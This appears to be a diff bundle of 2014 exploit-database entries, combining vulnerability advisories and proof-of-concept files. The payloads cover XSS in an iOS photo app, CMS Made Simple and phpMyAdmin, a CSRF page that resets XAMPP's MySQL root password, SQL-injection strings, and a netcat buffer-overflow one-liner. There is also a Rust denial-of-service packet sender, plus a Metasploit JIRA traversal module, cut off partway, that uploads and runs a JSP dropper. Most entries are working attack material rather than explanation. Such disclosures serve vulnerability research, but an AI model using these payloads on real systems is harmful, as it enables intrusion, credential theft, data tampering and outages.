+A persistent input validation web vulnerability has been discovered  in the official Private Photo+Video v1.1 Pro iOS mobile web-application.
+The bug allows remote attackers to inject own malicious persistent script codes to the application-side of the vulnerable service.
+
+The vulnerability is located in the name value of the add `New Album` input module. Remote attackers are able to inject own malicious 
+script codes to the album name value input. The attacker vector is persistent and the injetction request method is GET. The inject can 
+be done by an album rename/add via mobile sync or by the web-interface via new album function. The security risk of the persistent web 
+vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.7(+)|(-)3.8.
+
+Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged mobile application account 
+or access to the local web interface service. Successful exploitation of the vulnerability results in persistent session hijacking (customers), 
+account steal via persistent web attacks, persistent phishing or persistent manipulation of module context.
+
+Request Method(s):
+				[+] GET
+
+Vulnerable Module(s):
+				[+] New Album
+
+Vulnerable Parameter(s):
+				[+] albumname > path value
+
+Affected Module(s):
+				[+] FileManager > Path Dir Index Listing
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability in the album name value can be exploited by local attackers via album sync but also by 
+remote attackers via web interface. In both cases low user interaction is required to exploit the web vulnerability. To reproduce the issue 
+or for security demonstration follow the provided information and steps below to continue.
+
+PoC: JSON JQ Request
+
+Request </cgi/album/list?0.08521237764797618>
+JSON: {"albums":[{"id":"3", "title":"Downloaded", "num":"0", "thumb":"/cgi/album/thumb/3", "password":"yes"},
+{"id":"137", "title":"%20'.[PERSISTENT INJECTED SCRIPT CODE!]>", "num":"0", "thumb":"/cgi/album/thumb/5", "password":"no"}]}
+
+
+PoC: WiFi Manager (Path Dir Listing) > Albumname
+
+<div id="content_container" class="content">
+<div class="folder">
+<ul id="album_list" class="foldercontainer"><li class="j_list_album" alt="0">
+<a alt="0" href="###"><p>%20'.[PERSISTENT INJECTED SCRIPT CODE!] <em>(0)</em></p></a></li></ul>
+<div class="newalbum"><input id="new_album" class="button" value="New Album" type="button"></div>
+			</div>
+			<div class="photos">
+				<div id="current_album_title" class="albumtitle"></div>
+				<div id="photo_list_container" class="list" style="display:none">
+					<ul id="photo_list" class="photocontainer"></ul>
+					<div class="pagecontrol"><p id="page_control"></p></div>
+				</div>
+				<div class="toolbar">
+					<input id="import_photos" class="button" value="Import" type="button">
+				</div>
+			</div>
+		</div>
+
+Note: The issue can be exploited by local attackers with physical device access (album sync) but also by remote attackers (wifi ui) via the `add new albums` module.
+
+
+--- PoC Session Logs [GET] ---
+
+18:39:26.834[161ms][total 161ms] Status: 200[OK]
+GET http://localhost:8080/cgi/album/list?0.18317864473383083 Load Flags[LOAD_BACKGROUND  VALIDATE_ALWAYS ] Gr??e des Inhalts[103] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Length[103]
+      Connection[close]
+
+
+18:39:26.999[58ms][total 58ms] Status: 200[OK]
+GET http://localhost:8080/cgi/album/default?0.05696050392233898 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[55] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Length[55]
+      Connection[close]
+
+
+18:40:27.389[140ms][total 140ms] Status: 200[OK]
+GET http://localhost:8080/cgi/album/add/%5BPERSISTENT%20INJECTED%20SCRIPT%20CODE!%5D?0.6839441036305055 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[12] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Length[12]
+      Connection[close]
+
+
+18:40:27.535[76ms][total 76ms] Status: 200[OK]
+GET http://localhost:8080/cgi/album/list?0.4844814145331481 Load Flags[LOAD_BACKGROUND  ] Gr??e des Inhalts[220] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[application/json, text/javascript, */*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Length[220]
+      Connection[close]
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the albumname sync and album name add input values.
+Encode the input and parse the 
+output in the path dir listing again to prevent further persistent script code injects.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability is estimated as medium(+).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+

platforms/linux/dos/32726.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33299/info
+
+Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions.
+
+echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652 

platforms/linux/remote/32691.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33066/info
+
+Audio File Library ('libaudiofile') is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary machine code in the context of applications using the vulnerable library. Failed exploit attempts will likely cause denial-of-service conditions.
+
+This issue affects libaudiofile 0.2.6; other versions may also be vulnerable. 
+
+http://www.exploit-db.com/sploits/32691.wav

platforms/php/webapps/32668.txt

@@ -0,0 +1,104 @@
+Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability
+
+Google dork : N/A
+
+Date : 02/04/2014
+
+Exploit Author : Blessen Thomas
+
+Vendor Homepage : http://www.cmsmadesimple.org/
+
+Software Link : N/A
+
+Version : 1.11.10
+
+Tested on : Windows 7 hosted in WAMP server
+
+Type of Application :  open source content management system,
+
+
+
+
+
+Stored XSS :
+
+Login to the admin portal and access search functionality
+
+http://localhost/cmsmadesimple-1.11.10-full/index.php
+
+Here the " search " parameter is vulnerable to stored xss.
+
+Payload :
+
+'">><marquee><img src=x onerror=confirm(1)
+
+request:
+
+POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1
+
+Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
+Gecko/20100101 Firefox/28.0 Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
+http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie:
+_sx_=3ee623ee0900c03b; cms_admin_user_id=1;
+cms_passhash=fcb88b76587f0658cd2481a004312918;
+CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7;
+PHPSESSID=5fvasiledip329l0bhr2ulb1j0;
+CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded Content-Length: 153
+
+mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit
+
+response :
+
+
+<div id="search" class="core-float-right">
+            '">><marquee><img src=x onerror=confirm(1)
+          </div>
+             <a href="http://localhost/cmsmadesimple-1.11.10-full/"
+title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
+</div>
+
+
+
+
+
+Reflected XSS :
+
+Login to the admin portal and click the "My Preferences" and click "My
+account" section.
+
+Here , the "email address" parameter is vulnerable to reflected XSS.
+
+Payload :
+
+"";</script><script>alert(0)</script><"
+
+request :
+
+POST
+http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
+HTTP/1.1
+
+Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
+Gecko/20100101 Firefox/28.0 Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
+http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie:
+_sx_=1c8c76366630b299; cms_admin_user_id=1;
+cms_passhash=fcb88b76587f0658cd2481a004312918;
+CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded Content-Length: 103
+
+active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit
+
+
+response :
+
+</aside>	 </div>	 <!-- end sidebar //-->	 <!-- start main
+-->	 <div id="oe_mainarea" class="cf">	 <aside class="message
+pageerrorcontainer" role="alert"><p>The email address entered is
+invalid: "";</script><script>alert(0)</script><"</p></aside><article
+role="main" class="content-inner"><header class="pageheader
+cf"><h1>My&nbsp;Account</h1><script type="text/javascript">

platforms/php/webapps/32721.txt

@@ -0,0 +1,111 @@
+# Title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 <= multiple vulnerabilities
+# Date: 6/04/2014
+# Author: 
+# Software Link: http://www.apachefriends.org/en/xampp-windows.html
+# Version: 	3.2.1 & 4.1.6
+# Tested on: Windows 7
+# CVE : ()
+ 
+ ??? ??  ???       ??????   ?? ?????????  ??????  ??????? ??????   ??????  ?? ???
+???? ?????????    ???? ??   ????? ??   ? ??? ? ??????? ?????   ? ???    ?  ????? 
+???????????  ???  ???    ? ?????? ????   ??? ??? ????   ??????   ? ????   ?????? 
+??? ??? ????????? ???? ??????? ?? ???  ? ???????  ????   ????  ?   ?   ?????? ?? 
+???????? ??   ????? ????? ????? ????????????? ??????????? ???????????????????? ??
+ ? ????? ??   ????? ?? ?  ?? ?? ???? ?? ?? ?? ???? ???  ? ?? ?? ?? ??? ? ?? ?? ??
+ ? ??? ?  ?   ?? ?  ?  ?   ? ?? ?? ? ?  ?  ?? ? ?? ? ?  ?  ? ?  ?? ??  ? ?? ?? ??
+ ?  ?? ?  ?   ?   ?        ? ?? ?    ?     ??   ?  ? ?  ?    ?   ?  ?  ?  ? ?? ? 
+ ?  ?  ?      ?  ?? ?      ?  ?      ?  ?   ?        ?       ?  ?      ?  ?  ?   
+ 
+[#]----------------------------------------------------------------[#]
+#
+# [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilites
+# [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra)
+# [x] Contact : mayank.kapoor1708@gmail.com, gurjant31@gmail.com, sujoy3188@gmail.com
+# [+] Download : http://www.apachefriends.org/en/xampp-windows.html
+#
+[#]----------------------------------------------------------------[#]
+#
+# [x] Exploit :
+#
+[1] phpMyAdmin is vulnerable to a cross site scripting attack.
+# The vulnerability exists within the phpMyAdmin module supplied by XAMPP.
+#
+# 1. Cross Site Scripting
+# 
+# In the phpMyAdmin module of the XAMPP application the following urls are vulnerable to cross site scripting attacks. The "db" parameter can be passed with 
+# { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php"
+# checks if the "db" parameter is a valid database name or not (line 13-18).
+#
+	if (empty($is_db)) {
+	    if (strlen($db)) {
+		$is_db = @$GLOBALS['dbi']->selectDb($db);
+	    } else {
+		$is_db = false;
+	    }
+
+
+# Vulnerable parameter: "db"
+# http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php
+#
+# Multiple URL's afected:
+  http://[host]/phpmyadmin/db_printview.php
+  http://[host]/phpmyadmin/index.php
+  http://[host]/phpmyadmin/pmd_general.php
+  http://[host]/phpmyadmin/prefs_manage.php
+  http://[host]/phpmyadmin/server_collations.php
+  http://[host]/phpmyadmin/server_databases.php
+  http://[host]/phpmyadmin/server_engines.php
+  http://[host]/phpmyadmin/server_export.php
+  http://[host]/phpmyadmin/server_import.php
+  http://[host]/phpmyadmin/server_privileges.php
+  http://[host]/phpmyadmin/server_replication.php
+  http://[host]/phpmyadmin/server_sql.php
+  http://[host]/phpmyadmin/server_status.php
+  http://[host]/phpmyadmin/server_variables.php
+  http://[host]/phpmyadmin/sql.php
+  http://[host]/phpmyadmin/tbl_create.php
+
+# Vulnerable parameter: "table"
+#
+# Similar to the above mentioned vulnerability, here the "table" parameter also can be submitted with { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack.
+#
+# Multiple URL's afected:
+
+ http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708
+
+ http://[host]/phpmyadmin/tbl_structure.php
+#
+#
+# 2. Cross Site Request Forgery
+# After installing XAMPP the default password for MySQL is blank with the default user being "root". In the link "http://localhost/security/xamppsecurity.php" there is an option to change
+# the MySQL password for the user "root". The form that submits the new password is not authenticated with a token or any such XSRF protection. The below html page can be sent to the victim,
+
+	<html>
+	<script>
+	document.getElementById("xampp").submit();
+	</script>
+	  <body onload="run_once()">
+	    <form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST">
+	      <input type="hidden" name="mypasswd" value="test@123" />
+	      <input type="hidden" name="mypasswdrepeat" value="test@123" />
+	      <input type="hidden" name="authphpmyadmin" value="cookie" />
+	      <input type="hidden" name="changing" value="Password changing" />
+	      <input type="hidden" name="xamppuser" value="" />
+	      <input type="hidden" name="xampppasswd" value="" />
+	      <input type="submit" value="Click here" />
+	    </form>
+	  </body>
+	</html>
+
+# thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation.
+#
+#
+# Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl .
+
+ http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam
+
+ dork: "inurl:xampp/guestbook-en.pl"
+
+[#]----------------------------------------------------------------[#]
+ 
+#EOF

platforms/php/webapps/32724.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/33271/info
+
+Dark Age CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dark Age CMS 0.2c beta is vulnerable; other versions may also be affected. 
+
+The following example data is available:
+
+Username: x' OR 'x' = 'x'#
+Password: anything 

platforms/php/webapps/32727.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33300/info
+
+MKPortal is prone to multiple security vulnerabilities, including SQL-injection, HTML-injection, cross-site scripting, arbitrary-file-upload, and insecure-temporary-file-creation vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
+
+MKPortal 1.2.1 is vulnerable; other versions may also be affected.
+
+http://localhost/mkportal.1.2.1/index.php?ind=blog&op=edit_template',template=@@version,template2='

platforms/php/webapps/32728.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33300/info
+ 
+MKPortal is prone to multiple security vulnerabilities, including SQL-injection, HTML-injection, cross-site scripting, arbitrary-file-upload, and insecure-temporary-file-creation vulnerabilities.
+ 
+Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
+ 
+MKPortal 1.2.1 is vulnerable; other versions may also be affected.
+
+http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php
+?i=<script>alert(123);</script>

platforms/php/webapps/32732.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33309/info
+
+Masir Camp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/?Culture=fa-IR&page=search&SearchKeywords=[SQL] 

platforms/php/webapps/32733.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33310/info
+
+The 'w3bcms' application is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[Path]/index.php?seite=20%2Egaestebuch&action=[SQL]&id=1 

platforms/windows/dos/32704.pl

@@ -0,0 +1,88 @@
+?/*
+
+MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit
+
+
+Vendor: MA Lighting Technology GmbH
+Product web page: http://www.malighting.com
+Affected version: grandMA series 1 onPC Software 6.808 (6.801)
+
+Summary: The grandMA onPC software incorporates all functions of a grandMA
+console and offers you its full potential on your notebook or PC. You can
+use grandMA onPC for running, programming or offline pre-programming, as
+well as a smart backup solution within the grandMA system. With the MA onPC
+command wing and MA onPC fader wing MA Lighting has developed a sophisticated
+hardware extension perfectly suited for the grandMA onPC software.
+
+Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
+issue when processing socket connection negotiation. This issue occurs when
+the application handles a single malformed packet over TCP port 7003, resulting
+in a crash.
+
+===========================================================================
+
+(1324.be4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
+eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0         nv up ei pl nz ac pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
+ntdll!RtlEnterCriticalSection+0x12:
+77ce22c2 f00fba3000      lock btr dword ptr [eax],0   ds:002b:3535393f=????????
+
+--
+
+303.640 GMA : RR NEW  STATION IN NETWORK 127.0.0.1(100) AS Standalone
+367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
+367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
+367.180 CC  : ******* EXCEPTION **************************
+367.180 CC  : * ACCESS_VIOLATION
+367.180 CC  : * EAX = 37363341  EBX =  6D856B0
+367.180 CC  : * ECX = 37363339  EDX =  B78F41C
+367.180 CC  : * ESI = 37363341  EDI = 3736333D
+367.180 CC  : * DESKTYP : GMA [Windows]
+367.180 CC  : * VERSION : 6.808 STREAMING : 6801
+367.180 CC  : ********************************************
+367.240 CC  : 0x775522c2 RtlEnterCriticalSection() + 0x12
+
+===========================================================================
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5183
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php
+
+
+31.03.2014
+
+*/
+
+
+use std::io::net::ip::SocketAddr;
+use std::io::net::tcp::TcpStream;
+
+fn bann() {
+	println!("
+	+======================================+
+	| grandMA onPC 6.808 Denial of Service |
+	|--------------------------------------|
+	|                                      |
+	|           ID: ZSL-2014-5183          |
+	+======================================+
+	");
+}
+
+fn main() {
+	bann();
+	println!("\n[*] Sending packet to local host on tcp port 7003\n");
+	let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
+	let mut socket = TcpStream::connect(addr).unwrap();
+	socket.write(bytes!("\x74\x30\x30\x74\x21"));
+	println!("[*] Crashed!\n");
+}

platforms/windows/remote/32699.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33112/info
+
+Google Chrome is prone to an information-disclosure vulnerability because it fails to adequately validate server-issued instructions while in PASV (passive) mode.
+
+Attackers can exploit this issue to port-scan networks inside a victim computer's firewall. Information harvested may aid in further attacks.
+
+Google Chrome 1.0.154.36 is affected; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/32699.zip

platforms/windows/remote/32725.rb

@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'JIRA Issues Collector Directory Traversal',
+      'Description' => %q{
+        This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists
+        in the issues collector code, while handling attachments provided by the user. It can be
+        exploited in Windows environments to get remote code execution. This module has been tested
+        successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.
+      },
+      'Author'       =>
+        [
+          'Philippe Arteau', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2014-2314'],
+          [ 'OSVDB', '103807' ],
+          [ 'BID', '65849' ],
+          [ 'URL', 'https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26' ],
+          [ 'URL', 'http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'Targets'     =>
+        [
+          [ 'Jira 6.0.3 / Windows 2003 SP2',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Feb 26 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'Path to JIRA', '/']),
+        OptInt.new('COLLECTOR', [true, 'Collector ID'])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        # By default C:\Program Files\Atlassian\JIRA\atlassian-jira\QhVRutsh.jsp
+        OptString.new('JIRA_PATH', [true, 'Path to the JIRA web folder from the Atlassian installation directory', "JIRA\\atlassian-jira"]),
+        # By default file written to C:\Program Files\Atlassian\Application Data\JIRA\caches\tmp_attachments\$random_\, we want to traversal until 'Atlassian'
+        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 6])
+      ], self.class)
+  end
+
+  def get_upload_token
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path, "rest", "collectors", "1.0", "tempattachment", datastore['COLLECTOR']),
+        'method' => 'POST',
+        'data'   => rand_text_alpha(10 + rand(10)),
+        'vars_get' =>
+          {
+            'filename' => rand_text_alpha(10 + rand(10))
+          }
+      })
+
+    if res and res.code == 500 and res.body =~ /"token":"(.*)"}/
+      csrf_token = $1
+      @cookie = res.get_cookies
+    else
+      csrf_token = ""
+    end
+
+    return csrf_token
+  end
+
+  def upload_file(filename, contents, csrf_token)
+    traversal = "..\\" * datastore['TRAVERSAL_DEPTH']
+    traversal << datastore['JIRA_PATH']
+
+    res = send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path, "rest", "collectors", "1.0", "tempattachment", datastore['COLLECTOR']),
+        'method' => 'POST',
+        'data'   => contents,
+        'cookie' => @cookie,
+        'ctype'  => 'text/plain',
+        'vars_get' =>
+          {
+            'filename' => "#{traversal}\\#{filename}",
+            'atl_token' => csrf_token
+          }
+      })
+
+    if res and res.code == 201 and res.body =~ /\{"name":".*#{filename}"/
+      register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{filename}")
+      register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}")
+      return true
+    else
+      print_error("#{peer} - Upload failed...")
+      return false
+    end
+  end
+
+  def upload_and_run_jsp(filename, contents)
+    print_status("#{peer} - Getting a valid CSRF token...")
+    csrf_token = get_upload_token
+    fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty?
+
+    print_status("#{peer} - Exploiting traversal to upload JSP dropper...")
+    upload_file(filename, contents, csrf_token)
+
+    print_status("#{peer} - Executing the dropper...")
+    send_request_cgi(
+      {
+        'uri'    => normalize_uri(target_uri.path, filename),
+        'method' => 'GET'
+      })
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'login.jsp'),
+    })
+
+    if res and res.code == 200 and res.body =~ /<meta name="application-name" content="JIRA" data-name="jira" data-version="([0-9\.]*)">/
+      version = $1
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    if version <= "6.0.3"
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Generating EXE...")
+    exe = payload.encoded_exe
+    @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe"
+
+    print_status("#{peer} - Generating JSP dropper...")
+    dropper = jsp_drop_and_execute(exe, @exe_filename)
+    dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
+
+    print_status("#{peer} - Uploading and running JSP dropper...")
+    upload_and_run_jsp(dropper_filename, dropper)
+  end
+
+  # This should probably go in a mixin (by egypt)
+  def jsp_drop_bin(bin_data, output_file)
+    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+    jspraw << %Q|<%\n|
+    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+    jspraw << %Q|int numbytes = data.length();\n|
+
+    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+    jspraw << %Q|{\n|
+    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
+    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
+    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
+    jspraw << %Q|  comb <<= 4;\n|
+    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
+    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
+    jspraw << %Q|}\n|
+
+    jspraw << %Q|outputstream.write(bytes);\n|
+    jspraw << %Q|outputstream.close();\n|
+    jspraw << %Q|%>\n|
+
+    jspraw
+  end
+
+  def jsp_execute_command(command)
+    jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+    jspraw << %Q|<%\n|
+    jspraw << %Q|try {\n|
